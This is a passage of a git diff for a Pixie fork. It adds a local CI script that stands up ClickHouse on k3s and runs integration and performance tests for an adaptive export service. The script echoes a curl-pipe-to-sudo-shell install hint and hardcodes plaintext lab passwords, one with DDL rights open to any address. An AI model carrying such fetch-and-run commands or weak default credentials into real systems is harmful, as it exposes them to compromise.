"com_github_googleapis_enterprise_certificate_proxy", @@ -2282,8 +2282,8 @@ def pl_go_dependencies(): name = "com_github_klauspost_compress", build_directives = ["gazelle:map_kind go_binary pl_go_binary @px//bazel:pl_build_system.bzl", "gazelle:map_kind go_test pl_go_test @px//bazel:pl_build_system.bzl"], importpath = "github.com/klauspost/compress", - sum = "h1:RlWWUY/Dr4fL8qk9YG7DTZ7PDgME2V4csBXA8L/ixi4=", - version = "v1.17.2", + sum = "h1:6KIumPrER1LHsvBVuDa0r5xaG0Es51mhhB9BQB2qeMA=", + version = "v1.17.9", ) go_repository( name = "com_github_klauspost_cpuid", @@ -2992,6 +2992,13 @@ def pl_go_dependencies(): sum = "h1:mvZaddk4E4kLcXhzb+cxBsMPYp2pHqiQpWYkInsuZPQ=", version = "v1.3.0", ) + go_repository( + name = "com_github_parquet_go_parquet_go", + build_directives = ["gazelle:map_kind go_binary pl_go_binary @px//bazel:pl_build_system.bzl", "gazelle:map_kind go_test pl_go_test @px//bazel:pl_build_system.bzl"], + importpath = "github.com/parquet-go/parquet-go", + sum = "h1:l7jJwNM0xrk0cnIIptWMtnSnuxRkwq53S+Po3KG8Xgo=", + version = "v0.25.1", + ) go_repository( name = "com_github_pascaldekloe_goe", build_directives = ["gazelle:map_kind go_binary pl_go_binary @px//bazel:pl_build_system.bzl", "gazelle:map_kind go_test pl_go_test @px//bazel:pl_build_system.bzl"], @@ -3041,6 +3048,13 @@ def pl_go_dependencies(): sum = "h1:rZQtoozkfsiNs36c7Tdv/gyGNzD1X1XWKO8rptVNZuM=", version = "v0.0.0-20171002181615-b8543db493a5", ) + go_repository( + name = "com_github_pierrec_lz4_v4", + build_directives = ["gazelle:map_kind go_binary pl_go_binary @px//bazel:pl_build_system.bzl", "gazelle:map_kind go_test pl_go_test @px//bazel:pl_build_system.bzl"], + importpath = "github.com/pierrec/lz4/v4", + sum = "h1:yOVMLb6qSIDP67pl/5F7RepeKYu/VmTyEXvuMI5d9mQ=", + version = "v4.1.21", + ) go_repository( name = "com_github_pingcap_errors", build_directives = ["gazelle:map_kind go_binary pl_go_binary @px//bazel:pl_build_system.bzl", "gazelle:map_kind go_test pl_go_test @px//bazel:pl_build_system.bzl"], @@ -4427,6 +4441,7 @@ def pl_go_dependencies(): name = "org_golang_google_protobuf", build_directives = ["gazelle:map_kind go_binary pl_go_binary @px//bazel:pl_build_system.bzl", "gazelle:map_kind go_test pl_go_test @px//bazel:pl_build_system.bzl"], importpath = "google.golang.org/protobuf", + replace = "google.golang.org/protobuf", sum = "h1:7QBf+IK2gx70Ap/hDsOmam3GE0v9HicjfEdAxE62UoM=", version = "v1.29.1", ) diff --git a/k8s/vizier/bootstrap/adaptive_export_deployment.yaml b/k8s/vizier/bootstrap/adaptive_export_deployment.yaml index dcb9305bbb4..5d091f2c989 100644 --- a/k8s/vizier/bootstrap/adaptive_export_deployment.yaml +++ b/k8s/vizier/bootstrap/adaptive_export_deployment.yaml @@ -18,17 +18,12 @@ spec: nodeAffinity: requiredDuringSchedulingIgnoredDuringExecution: nodeSelectorTerms: + # The beta.kubernetes.io/os label has been deprecated since + # k8s v1.14; every modern kubelet sets kubernetes.io/os. The + # single term below is enough — kept both ORed terms in the + # past for pre-1.14 compatibility. 
- matchExpressions: - key: kubernetes.io/os - operator: Exists - - key: kubernetes.io/os - operator: In - values: - - linux - - matchExpressions: - - key: beta.kubernetes.io/os - operator: Exists - - key: beta.kubernetes.io/os operator: In values: - linux @@ -57,6 +52,31 @@ spec: value: "10" - name: DETECTION_LOOKBACK_SEC value: "30" + # EXPORT_MODE controls the reconcile behaviour: + # auto - detection drives on/off (default) + # always - plugin always enabled (bypass detection) + # never - plugin always disabled and ch-* scripts purged + - name: EXPORT_MODE + value: "auto" + # Number of consecutive empty detection ticks before auto-disable fires. + - name: EXPORT_QUIET_TICKS + value: "6" + # Optional overrides for the ClickHouse PxL scripts. When unset they are + # parsed from CLICKHOUSE_DSN. Individual fields win over the parsed DSN. + # Defaults below match soc/tree/clickhouse-lab (forensic-soc-db CHI, + # ingest_writer user, forensic_db database). + - name: KUBESCAPE_TABLE + value: "kubescape_logs" + # - name: CLICKHOUSE_HOST + # value: "clickhouse-forensic-soc-db.clickhouse.svc.cluster.local" + # - name: CLICKHOUSE_PORT + # value: "9000" + # - name: CLICKHOUSE_USER + # value: "ingest_writer" + # - name: CLICKHOUSE_PASSWORD + # value: "changeme-ingest" + # - name: CLICKHOUSE_DATABASE + # value: "forensic_db" securityContext: allowPrivilegeEscalation: false capabilities: diff --git a/k8s/vizier/bootstrap/adaptive_export_secrets.yaml b/k8s/vizier/bootstrap/adaptive_export_secrets.yaml index 19be138743b..beced120f63 100644 --- a/k8s/vizier/bootstrap/adaptive_export_secrets.yaml +++ b/k8s/vizier/bootstrap/adaptive_export_secrets.yaml @@ -7,5 +7,8 @@ type: Opaque stringData: # Replace with your actual Pixie API key from https://work.withpixie.ai pixie-api-key: "PIXIE_API_KEY_PLACEHOLDER" - # Replace with your ClickHouse DSN: clickhouse://user:password@host:port/database - clickhouse-dsn: "otelcollector:otelcollectorpass@hyperdx-hdx-oss-v2-clickhouse.click.svc.cluster.local:9000/default" + # ClickHouse DSN matches soc/tree/clickhouse-lab (CHI "forensic-soc-db", + # ingest_writer user with INSERT rights into the forensic_db database). + # Format: user:password@host:port/database + clickhouse-dsn: >- + ingest_writer:changeme-ingest@clickhouse-forensic-soc-db.clickhouse.svc.cluster.local:9000/forensic_db diff --git a/local-ci.sh b/local-ci.sh new file mode 100755 index 00000000000..3b02edccccd --- /dev/null +++ b/local-ci.sh @@ -0,0 +1,547 @@ +#!/usr/bin/env bash +# local-ci.sh — repeatable end-to-end test for the adaptive_export feature +# (PR #37, branch entlein/adaptive-write). +# +# Verifies the failure mode the user reported ("tables never appear in +# the clickhouse database") by exercising every persistence path the +# operator exposes against a real ClickHouse running in a local k3s. +# +# Phases (default = 0..8; --full adds 9): +# 0 pre-flight tooling (k3s, kubectl, helm, go, golangci-lint) +# 1 unit tests (go test ./src/vizier/services/adaptive_export/...) 
+# 2 lint (go vet + golangci-lint) +# 3 bring up ClickHouse via soc/clickhouse-lab (Altinity operator +# + keeper + CHI + soc-side schema for alerts + kubescape_logs) +# 4 sanity: forensic_db / alerts / kubescape_logs exist (soc layer) +# 5 operator's Apply() against live CH — ALL 12 pixie tables + +# adaptive_attribution must materialise +# 6 VerifyPixieSchema — required columns present on every pixie table +# 7 sink: AttributionRow + WritePixieRows for every PixieTable +# 8 trigger: insert kubescape_logs row, expect a kubescape.Event +# 9 (--full) bazel build + image push + operator deploy + e2e smoke +# +# Modes: +# ./local-ci.sh # phases 0..8 +# ./local-ci.sh --full # phases 0..9 +# ./local-ci.sh --phases=1,2 # specific phases only +# ./local-ci.sh --skip-cluster # skip phase 3 (assume CH up) +# ./local-ci.sh --teardown # destroy the CH install + cluster +# ./local-ci.sh --reset # teardown then full run +# +# Idempotent: re-running keeps the cluster, ports, and kubeconfig. +# Test rows use unique tags per run so they don't collide. + +set -euo pipefail + +# --- paths + config ----------------------------------------------------- + +SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)" +SOC_DIR="${SOC_DIR:-/home/constanze/code/soc-clone/soc}" +SOC_CH_DIR="$SOC_DIR/tree/clickhouse-lab" +CH_NS="${CH_NS:-clickhouse}" +CHI_NAME="${CHI_NAME:-forensic-soc-db}" +KEEPER_NAME="${KEEPER_NAME:-forensic-keeper}" +CH_OPERATOR_VERSION="${CH_OPERATOR_VERSION:-0.26.0}" +PORT_FWD_PORT="${PORT_FWD_PORT:-18123}" +SCHEMA_ADMIN_USER="${SCHEMA_ADMIN_USER:-schema_admin}" +SCHEMA_ADMIN_PASS="${SCHEMA_ADMIN_PASS:-localci-admin}" +KUBECONFIG_SRC="/etc/rancher/k3s/k3s.yaml" +KUBECONFIG_DST="$HOME/.kube/local-ci.yaml" +PORT_FWD_PIDFILE="/tmp/local-ci-pf.pid" +PIXIE_REPO="$SCRIPT_DIR" +GO_PKG="px.dev/pixie/src/vizier/services/adaptive_export/..." + +# --- presentation ------------------------------------------------------- + +C_RED=$'\e[31m'; C_GRN=$'\e[32m'; C_YLW=$'\e[33m'; C_BLU=$'\e[36m'; C_RST=$'\e[0m' +PASS=0; FAIL=0 +phase() { echo "${C_BLU}=== $* ===${C_RST}"; } +ok() { echo " ${C_GRN}PASS${C_RST}: $*"; PASS=$((PASS+1)); } +fail() { echo " ${C_RED}FAIL${C_RST}: $*"; FAIL=$((FAIL+1)); } +info() { echo " ${C_YLW}info${C_RST}: $*"; } +need() { command -v "$1" >/dev/null 2>&1 || { echo "${C_RED}missing tool: $1${C_RST}"; exit 1; }; } +check() { local label="$1"; shift; if "$@"; then ok "$label"; else fail "$label"; fi; } + +# --- arg parsing -------------------------------------------------------- + +PHASES_ARG="" +SKIP_CLUSTER=0 +TEARDOWN=0 +RESET=0 +FULL=0 +for arg in "$@"; do + case "$arg" in + --phases=*) PHASES_ARG="${arg#--phases=}" ;; + --skip-cluster) SKIP_CLUSTER=1 ;; + --teardown) TEARDOWN=1 ;; + --reset) RESET=1 ;; + --full) FULL=1 ;; + -h|--help) sed -n '2,30p' "$0"; exit 0 ;; + *) echo "unknown arg: $arg"; exit 1 ;; + esac +done + +# --- kubeconfig + sudo helper ------------------------------------------- + +setup_kubeconfig() { + if [[ ! -f "$KUBECONFIG_SRC" ]]; then + echo "${C_RED}k3s kubeconfig not found at $KUBECONFIG_SRC; is k3s installed?${C_RST}" + exit 1 + fi + mkdir -p "$(dirname "$KUBECONFIG_DST")" + if [[ ! 
-f "$KUBECONFIG_DST" || "$KUBECONFIG_SRC" -nt "$KUBECONFIG_DST" ]]; then + sudo cat "$KUBECONFIG_SRC" > "$KUBECONFIG_DST" + chmod 600 "$KUBECONFIG_DST" + fi + export KUBECONFIG="$KUBECONFIG_DST" +} + +cleanup_port_forward() { + if [[ -f "$PORT_FWD_PIDFILE" ]]; then + local pid; pid=$(cat "$PORT_FWD_PIDFILE" 2>/dev/null || true) + if [[ -n "$pid" ]] && kill -0 "$pid" 2>/dev/null; then + kill "$pid" 2>/dev/null || true + fi + rm -f "$PORT_FWD_PIDFILE" + fi +} +trap cleanup_port_forward EXIT + +# --- teardown ----------------------------------------------------------- + +teardown() { + setup_kubeconfig + phase "teardown" + cleanup_port_forward + kubectl delete chi "$CHI_NAME" -n "$CH_NS" --wait --ignore-not-found + kubectl delete chk "$KEEPER_NAME" -n "$CH_NS" --wait --ignore-not-found 2>/dev/null || true + helm uninstall clickhouse-operator -n "$CH_NS" 2>/dev/null || true + kubectl delete pvc -n "$CH_NS" --all --wait --ignore-not-found 2>/dev/null || true + kubectl delete ns "$CH_NS" --wait --ignore-not-found 2>/dev/null || true + echo "${C_GRN}torn down${C_RST}" +} + +if [[ "$TEARDOWN" -eq 1 ]]; then + teardown + exit 0 +fi +if [[ "$RESET" -eq 1 ]]; then + teardown || true +fi + +# --- which phases? ------------------------------------------------------ + +if [[ -n "$PHASES_ARG" ]]; then + IFS=',' read -ra PHASES <<<"$PHASES_ARG" +else + PHASES=(0 1 2 3 4 5 6 7 8) + [[ "$FULL" -eq 1 ]] && PHASES+=(9) + [[ "$SKIP_CLUSTER" -eq 1 ]] && PHASES=("${PHASES[@]/3}") +fi +in_phase() { local p="$1"; for x in "${PHASES[@]}"; do [[ "$x" == "$p" ]] && return 0; done; return 1; } + +# --- phase 0: pre-flight ------------------------------------------------ + +if in_phase 0; then + phase "0/9 pre-flight tooling" + need go; need golangci-lint; need kubectl; need helm; need curl; need jq + if ! systemctl is-active --quiet k3s; then + fail "k3s is not running (systemctl is-active k3s)" + echo " install with: curl -sfL https://get.k3s.io | sudo INSTALL_K3S_EXEC='server --write-kubeconfig-mode=644 --disable=traefik' sh -" + exit 1 + fi + ok "k3s active" + setup_kubeconfig + kubectl get nodes >/dev/null && ok "kubectl can reach k3s" +fi + +# --- phase 1: unit tests ------------------------------------------------ + +if in_phase 1; then + phase "1/9 unit tests" + cd "$PIXIE_REPO" + if go test -count=1 -timeout 60s "./src/vizier/services/adaptive_export/..."; then + ok "go test ./src/vizier/services/adaptive_export/..." + else + fail "go test" + [[ "$FAIL" -gt 0 ]] && exit 1 + fi +fi + +# --- phase 2: lint ------------------------------------------------------ + +if in_phase 2; then + phase "2/9 lint" + cd "$PIXIE_REPO" + if go vet ./src/vizier/services/adaptive_export/...; then + ok "go vet" + else + fail "go vet" + fi + if golangci-lint run ./src/vizier/services/adaptive_export/...; then + ok "golangci-lint" + else + fail "golangci-lint (see output above)" + info "lint failures are NOT fatal — phase continues; address before merging PR #37" + fi +fi + +# --- phase 3: ClickHouse bring-up via soc ------------------------------- + +build_patched_installation_yaml() { + # Append a schema_admin user (allow_ddl=1) so the operator's Apply() + # path can be exercised end-to-end via HTTP. Default user is locked + # to localhost on Altinity images, ingest_writer/forensic_analyst + # have allow_ddl=0. The patched YAML is written to /tmp/. + local out=/tmp/local-ci-installation.yaml + cat "$SOC_CH_DIR/installation.yaml" >"$out" + # Insert the schema_admin user under spec.configuration.users. 
+ # Done via Python for reliability — yq isn't always installed. + python3 - "$out" <<'PY' +import sys, re +path = sys.argv[1] +text = open(path).read() +patch = ( + "\n # Local-CI admin: DDL-capable, used by the integration tests\n" + " schema_admin/profile: default\n" + " schema_admin/password: localci-admin\n" + " schema_admin/networks/ip: \"::/0\"\n" + " schema_admin/quota: default\n" +) +m = re.search(r'^ users:.*?(?=\n defaults:)', text, re.S | re.M) +if not m: + sys.exit("could not locate users: section in installation.yaml") +text = text[:m.end()] + patch + text[m.end():] +open(path, 'w').write(text) +PY + echo "$out" +} + +if in_phase 3; then + phase "3/9 ClickHouse via soc/clickhouse-lab" + setup_kubeconfig + kubectl create ns "$CH_NS" --dry-run=client -o yaml | kubectl apply -f - >/dev/null + + # Altinity operator + helm repo add altinity https://helm.altinity.com >/dev/null 2>&1 || true + helm repo update >/dev/null + if helm status clickhouse-operator -n "$CH_NS" >/dev/null 2>&1; then + ok "altinity operator already installed" + else + helm upgrade --install clickhouse-operator altinity/altinity-clickhouse-operator \ + --version "$CH_OPERATOR_VERSION" --namespace "$CH_NS" --create-namespace --wait + ok "altinity operator installed" + fi + + # Keeper + kubectl apply -f "$SOC_CH_DIR/keeper.yaml" >/dev/null + for i in $(seq 1 60); do + kubectl get pods -n "$CH_NS" -l "clickhouse-keeper.altinity.com/chk=$KEEPER_NAME" --no-headers 2>/dev/null | grep -q Running && break + sleep 3 + done + check "keeper running" kubectl get pods -n "$CH_NS" -l "clickhouse-keeper.altinity.com/chk=$KEEPER_NAME" --no-headers -o jsonpath='{.items[0].status.phase}' 2>/dev/null + + # CHI (patched with schema_admin) + PATCHED_YAML=$(build_patched_installation_yaml) + kubectl apply -f "$PATCHED_YAML" >/dev/null + + info "waiting for CHI pod to come Ready (up to 5 min)…" + for i in $(seq 1 100); do + PHASE=$(kubectl get pods -n "$CH_NS" -l "clickhouse.altinity.com/chi=$CHI_NAME" --no-headers -o jsonpath='{.items[0].status.phase}' 2>/dev/null || true) + [[ "$PHASE" == "Running" ]] && break + sleep 3 + done + CH_POD=$(kubectl get pods -n "$CH_NS" -l "clickhouse.altinity.com/chi=$CHI_NAME" -o jsonpath='{.items[0].metadata.name}' 2>/dev/null) + if [[ -z "$CH_POD" ]]; then fail "CHI pod did not start"; exit 1; fi + ok "CHI pod $CH_POD running" + + for i in $(seq 1 60); do + R=$(kubectl exec -n "$CH_NS" "$CH_POD" -- clickhouse-client -q "SELECT 1" 2>/dev/null | tr -d '[:space:]') || true + [[ "$R" == "1" ]] && break + sleep 2 + done + check "clickhouse-client responsive in pod" test "$R" = "1" + + # Apply soc-owned schema (alerts + kubescape_logs only after b7f5fe0). 
+ kubectl exec -i -n "$CH_NS" "$CH_POD" -- clickhouse-client --multiquery <"$SOC_CH_DIR/schema.sql" + ok "soc schema applied (alerts + kubescape_logs)" +fi + +# --- ensure port-forward to CH (used by phases 4..8) -------------------- + +ensure_port_forward() { + setup_kubeconfig + if [[ -f "$PORT_FWD_PIDFILE" ]] && kill -0 "$(cat "$PORT_FWD_PIDFILE")" 2>/dev/null; then + return 0 + fi + local svc + svc=$(kubectl get svc -n "$CH_NS" -o jsonpath='{range .items[*]}{.metadata.name}{"\n"}{end}' | grep -m1 "^chi-$CHI_NAME-" || true) + [[ -z "$svc" ]] && svc=$(kubectl get svc -n "$CH_NS" -o jsonpath='{range .items[*]}{.metadata.name}{"\n"}{end}' | grep -m1 "$CHI_NAME" || true) + [[ -z "$svc" ]] && { echo "${C_RED}no CH service found in ns/$CH_NS${C_RST}"; return 1; } + info "port-forward svc/$svc :$PORT_FWD_PORT → 8123" + ( kubectl port-forward -n "$CH_NS" "svc/$svc" "$PORT_FWD_PORT:8123" >/tmp/local-ci-pf.log 2>&1 ) & + echo $! >"$PORT_FWD_PIDFILE" + for i in $(seq 1 30); do + curl -sf "http://localhost:$PORT_FWD_PORT/?query=SELECT%201" \ + -u "$SCHEMA_ADMIN_USER:$SCHEMA_ADMIN_PASS" 2>/dev/null | grep -q "^1$" && return 0 + sleep 1 + done + echo "${C_RED}port-forward never became responsive — check /tmp/local-ci-pf.log${C_RST}" + return 1 +} + +ch_count() { + curl -sf "http://localhost:$PORT_FWD_PORT/?query=$1" \ + -u "$SCHEMA_ADMIN_USER:$SCHEMA_ADMIN_PASS" | tr -d '[:space:]' +} + +# --- phase 4: soc-layer sanity ------------------------------------------ + +if in_phase 4; then + phase "4/9 soc-layer sanity" + ensure_port_forward + for table in alerts kubescape_logs; do + GOT=$(ch_count "EXISTS%20forensic_db.$table" || echo "") + if [[ "$GOT" == "1" ]]; then ok "forensic_db.$table exists"; else fail "forensic_db.$table missing (soc/install.sh broken?)"; fi + done +fi + +# --- phase 5: operator Apply() integration ------------------------------ + +INTEGRATION_ENV=( + "INTEGRATION_CH_ENDPOINT=http://localhost:$PORT_FWD_PORT" + "INTEGRATION_CH_USER=$SCHEMA_ADMIN_USER" + "INTEGRATION_CH_PASSWORD=$SCHEMA_ADMIN_PASS" +) + +if in_phase 5; then + phase "5/9 operator's Apply() against live CH" + ensure_port_forward + cd "$PIXIE_REPO" + if env "${INTEGRATION_ENV[@]}" go test -tags=integration -count=1 -timeout 120s -v \ + -run 'TestApply_Live|TestApply_Idempotent' \ + ./src/vizier/services/adaptive_export/internal/clickhouse/...; then + ok "Apply() materialises all 13 operator-owned tables" + else + fail "Apply() integration test failed — this is the 'tables never appear' bug surface" + fi +fi + +# --- phase 6: VerifyPixieSchema ----------------------------------------- + +if in_phase 6; then + phase "6/9 VerifyPixieSchema" + ensure_port_forward + cd "$PIXIE_REPO" + if env "${INTEGRATION_ENV[@]}" go test -tags=integration -count=1 -timeout 60s -v \ + -run TestVerifyPixieSchema_Live \ + ./src/vizier/services/adaptive_export/internal/clickhouse/...; then + ok "VerifyPixieSchema passes" + else + fail "VerifyPixieSchema failed — required columns missing on a pixie table" + fi +fi + +# --- phase 7: sink ------------------------------------------------------- + +if in_phase 7; then + phase "7/9 sink: AttributionRow + WritePixieRows" + ensure_port_forward + cd "$PIXIE_REPO" + if env "${INTEGRATION_ENV[@]}" go test -tags=integration -count=1 -timeout 120s -v \ + -run 'TestSinkWriteAttribution_Live|TestSinkWritePixieRows_Live' \ + ./src/vizier/services/adaptive_export/internal/sink/...; then + ok "sink writes succeed for adaptive_attribution + every pixie table" + else + fail "sink integration test failed" + fi 
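+  # Any of the phase 5-8 tests can be reproduced by hand with the same env
+  # contract, e.g.:
+  #   INTEGRATION_CH_ENDPOINT=http://localhost:18123 \
+  #   INTEGRATION_CH_USER=schema_admin INTEGRATION_CH_PASSWORD=localci-admin \
+  #   go test -tags=integration -count=1 -run TestSinkWritePixieRows_Live -v \
+  #     ./src/vizier/services/adaptive_export/internal/sink/...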
+fi
+
+# --- phase 8: trigger ----------------------------------------------------
+
+if in_phase 8; then
+  phase "8/9 trigger: insert kubescape_logs row, expect Event"
+  ensure_port_forward
+  cd "$PIXIE_REPO"
+  if env "${INTEGRATION_ENV[@]}" go test -tags=integration -count=1 -timeout 60s -v \
+      -run TestTriggerSubscribe_Live \
+      ./src/vizier/services/adaptive_export/internal/trigger/...; then
+    ok "trigger surfaces the seeded row"
+  else
+    fail "trigger integration test failed"
+  fi
+fi
+
+# --- phase 9: perf-eval-soc-attack end-to-end ---------------------------
+#
+# Mirrors .github/workflows/perf_soc_attack.yaml, but adapted for a single
+# local k3s (the GH workflow targets a remote forensic cluster reachable
+# over Tailscale). Differences from the GH workflow:
+#   - Exports parquet locally instead of pushing to GCS (no gcloud creds
+#     on this VM).
+#   - Uses the in-cluster CH NodePort + a local `pixie` user instead of
+#     the AOCC public forensic CH (SOC_CH_HOST / SOC_CH_CREDS).
+#   - Reuses the Pixie deployment already running in `pl` instead of
+#     re-running `px deploy` + skaffold rebuild (SOC_VIZIER_EXISTING=1).
+#   - Drops --prom_recorder_override; recorders use the same kubeconfig.
+#
+# Required env (read from ~/.pixie/keys.env if not pre-exported):
+#   PX_API_KEY    — AOCC pixie-cloud API key (NOT exported in
+#                   the shell, passed via --api_key).
+#   PX_DEPLOY_KEY — present in keys.env but unused here (the
+#                   perf_tool uses the API key for vizier ops).
+# Optional:
+#   PERF_OUT_DIR  — defaults to /tmp/perf-out-$ts.
+#   PERF_TAGS     — extra tags, default "local-ci".
+
+if in_phase 9; then
+  phase "9/9 perf-eval-soc-attack (sovereign-soc/redis-attack)"
+  setup_kubeconfig
+  cd "$PIXIE_REPO"
+
+  # Pixie keys: prefer pre-exported env, else parse PX_API_KEY out of
+  # ~/.pixie/keys.env. Avoid `source` — that file may contain a
+  # placeholder `TS_AUTH_KEY=<...>` whose `<>` would trigger a
+  # shell syntax error.
+  if [[ -z "${PX_API_KEY:-}" && -r "$HOME/.pixie/keys.env" ]]; then
+    PX_API_KEY=$(awk -F= '/^PX_API_KEY=/{print substr($0, index($0,"=")+1); exit}' "$HOME/.pixie/keys.env")
+    export PX_API_KEY
+  fi
+  if [[ -z "${PX_API_KEY:-}" ]]; then
+    fail "PX_API_KEY not set and ~/.pixie/keys.env did not provide it"
+    exit 1
+  fi
+
+  # Make sure pixie cloud is reachable over tailscale before we waste
+  # 22+ min on a doomed experiment.
+  if ! curl -sf --max-time 5 -o /dev/null -w "%{http_code}\n" \
+      https://pixie.austrianopencloudcommunity.org/ | grep -qE "^(2|3)"; then
+    fail "AOCC pixie-cloud unreachable — is tailscale up? Run: sudo tailscale status"
+    exit 1
+  fi
+  ok "AOCC pixie-cloud reachable over tailscale"
+
+  # CHI NodePort: ensure the service exists (idempotent).
+  if ! kubectl -n "$CH_NS" get svc ch-perf-nodeport >/dev/null 2>&1; then
+    info "creating NodePort ch-perf-nodeport (CH 8123→30123, 9000→30900)"
+    cat <<YAML | kubectl apply -f - >/dev/null
+apiVersion: v1
+kind: Service
+metadata:
+  name: ch-perf-nodeport
+  namespace: $CH_NS
+spec:
+  type: NodePort
+  selector:
+    clickhouse.altinity.com/chi: $CHI_NAME
+  ports:
+    - {name: http, port: 8123, targetPort: 8123, nodePort: 30123}
+    - {name: native, port: 9000, targetPort: 9000, nodePort: 30900}
+YAML
+  fi
+  ok "CH NodePort ready (10.0.2.12:30123 http / :30900 native)"
+
+  # Ensure the `pixie` CH user exists with the grants the suite needs.
+  # Created via the `default` user (localhost-only on Altinity images, so
+  # this only works via kubectl exec, not from the host).
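+  # (Once created, the user is reachable from the host through the NodePort:
+  #   curl -s 'http://10.0.2.12:30123/?query=SELECT%201' -u pixie:pixie_password
+  # prints 1, same probe style as ch_count above.)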
+ CH_POD=$(kubectl get pods -n "$CH_NS" -l "clickhouse.altinity.com/chi=$CHI_NAME" -o jsonpath='{.items[0].metadata.name}') + kubectl exec -n "$CH_NS" "$CH_POD" -- clickhouse-client --user default --multiquery -q " + CREATE USER IF NOT EXISTS pixie IDENTIFIED WITH plaintext_password BY 'pixie_password' HOST ANY; + GRANT SHOW DATABASES, SHOW TABLES ON *.* TO pixie; + GRANT SELECT, INSERT ON forensic_db.* TO pixie; + GRANT SELECT, INSERT, CREATE TABLE, DROP TABLE ON default.* TO pixie; + " >/dev/null + ok "CH user pixie:pixie_password ready" + + # Pre-create default.redis_events — the clickhouse_export.pxl recorder + # INSERTs Pixie redis_events rows here every exportPeriod (5s), and + # Kelvin's ClickHouseExportSinkNode does NOT catch CH-client exceptions: + # any error (table missing, schema mismatch, OOM) crashes Kelvin with + # SIGSEGV → "context canceled" on the recorder stream → perf_tool aborts. + # Columns must match the source PxL DataFrame shape EXACTLY; the px_info_ + # column appears only in debug-built PEM (release builds #ifdef it out). + # If you swap to a release PEM, drop px_info_ from this DDL. + kubectl exec -n "$CH_NS" "$CH_POD" -- clickhouse-client --user pixie --password pixie_password --multiquery -q " + CREATE TABLE IF NOT EXISTS default.redis_events ( + time_ DateTime64(9, 'UTC'), + upid String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + req_cmd String, + req_args String, + resp String, + latency Int64, + px_info_ String, + hostname String, + event_time DateTime64(3, 'UTC') + ) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + " >/dev/null + ok "default.redis_events ready (sink target for clickhouse_export.pxl)" + + # Build perf_tool (cached after first run). + if ! bazel build //src/e2e_test/perf_tool:perf_tool //src/pixie_cli:px >/tmp/perf_tool-build.log 2>&1; then + fail "bazel build perf_tool/px CLI — see /tmp/perf_tool-build.log" + exit 1 + fi + PERF_BIN="bazel-bin/src/e2e_test/perf_tool/perf_tool_/perf_tool" + PX_BIN="bazel-bin/src/pixie_cli/px_/px" + # perf_tool's pxDeployImpl shells out to `px` via PATH (RunPXCmd → exec.Command("px")). + # Make sure the freshly-built binary is the one used. + if [[ ! 
-x /usr/local/bin/px || /usr/local/bin/px -ot "$PX_BIN" ]]; then
+    sudo install -m 0755 "$PX_BIN" /usr/local/bin/px
+  fi
+  ok "perf_tool built; px CLI at /usr/local/bin/px"
+
+  PERF_OUT_DIR="${PERF_OUT_DIR:-/tmp/perf-out-$(date +%Y%m%d-%H%M%S)}"
+  mkdir -p "$PERF_OUT_DIR"
+  COMMIT_SHA="$(git -C "$PIXIE_REPO" rev-parse --short HEAD)"
+  PERF_TAGS="${PERF_TAGS:-local-ci}"
+
+  info "experiment: sovereign-soc/redis-attack (BURNIN 2m + RUN 20m + deploy ~5m)"
+  info "output: $PERF_OUT_DIR"
+  info "commit: $COMMIT_SHA tags: $PERF_TAGS"
+
+  set +e
+  env \
+    BUILD_WORKSPACE_DIRECTORY="$PIXIE_REPO" \
+    LOG_LEVEL="${PERF_LOG_LEVEL:-info}" \
+    SOC_CH_HOST="10.0.2.12:30900" \
+    SOC_CH_CREDS="pixie:pixie_password" \
+    SOC_VIZIER_EXISTING="1" \
+    "$PERF_BIN" run \
+      --api_key="$PX_API_KEY" \
+      --cloud_addr=pixie.austrianopencloudcommunity.org:443 \
+      --commit_sha="$COMMIT_SHA" \
+      ${PERF_EXPERIMENT_NAME:+--experiment_name="$PERF_EXPERIMENT_NAME"} \
+      --suite=sovereign-soc \
+      --use_local_cluster \
+      --export_backend=parquet-local \
+      --parquet_dir="$PERF_OUT_DIR" \
+      --container_repo=ghcr.io/k8sstormcenter \
+      --max_retries=3 \
+      --tags "$PERF_TAGS" \
+      2>&1 | tee "$PERF_OUT_DIR/perf_tool.log"
+  RC=${PIPESTATUS[0]}
+  set -e
+
+  if [[ "$RC" -eq 0 ]]; then
+    PARQUET_COUNT=$(find "$PERF_OUT_DIR" -name "*.parquet" 2>/dev/null | wc -l)
+    ok "perf-eval-soc-attack passed; $PARQUET_COUNT parquet files in $PERF_OUT_DIR"
+  else
+    fail "perf-eval-soc-attack exit=$RC; see $PERF_OUT_DIR/perf_tool.log"
+  fi
+fi
+
+# --- summary ------------------------------------------------------------
+
+echo
+phase "summary"
+echo "  passed: $PASS"
+echo "  failed: $FAIL"
+[[ "$FAIL" -eq 0 ]]
diff --git a/perf-sweep.sh b/perf-sweep.sh
new file mode 100755
index 00000000000..b3f7ce02408
--- /dev/null
+++ b/perf-sweep.sh
@@ -0,0 +1,69 @@
+#!/usr/bin/env bash
+# perf-sweep.sh — run the sovereign-soc load-multiplier sweep on the local
+# k3s by invoking local-ci.sh phase 9 once per multiplier. Each run is ~25
+# min (30 s setup + 2 m BURNIN + 20 m RUN + ~3 m teardown), so the default
+# 6-multiplier sweep takes ~2h30m.
+#
+# Output: a single timestamped sweep dir under /tmp/perf-sweep-<ts>/,
+# with one parquet output subdir + one perf_tool log per multiplier:
+#
+#   /tmp/perf-sweep-20260514-…/
+#     2x/   2026/…/results_0000.parquet   spec.parquet   perf_tool.log
+#     4x/   …
+#     8x/   …
+#     16x/  …
+#     32x/  …
+#     64x/  …
+#     sweep.log   ← top-level log of which multiplier started/finished when
+#
+# Usage:
+#   ./perf-sweep.sh          # run the default set: 2×, 4×, 8×, 16×, 32×, 64×
+#   ./perf-sweep.sh 4x 16x   # just those two
+#
+# Stops on the first failure so a broken 2× run doesn't waste ~2h on the
+# rest.
+set -euo pipefail
+
+SWEEP_DIR=/tmp/perf-sweep-$(date +%Y%m%d-%H%M%S)
+mkdir -p "$SWEEP_DIR"
+SWEEP_LOG="$SWEEP_DIR/sweep.log"
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+
+log() { printf '%(%Y-%m-%dT%H:%M:%S)T %s\n' -1 "$*" | tee -a "$SWEEP_LOG"; }
+
+if [[ $# -eq 0 ]]; then
+  # Default sweep matches the multipliers wired into
+  # pixie/src/e2e_test/perf_tool/pkg/suites/suites.go → sovereignSOCSuite().
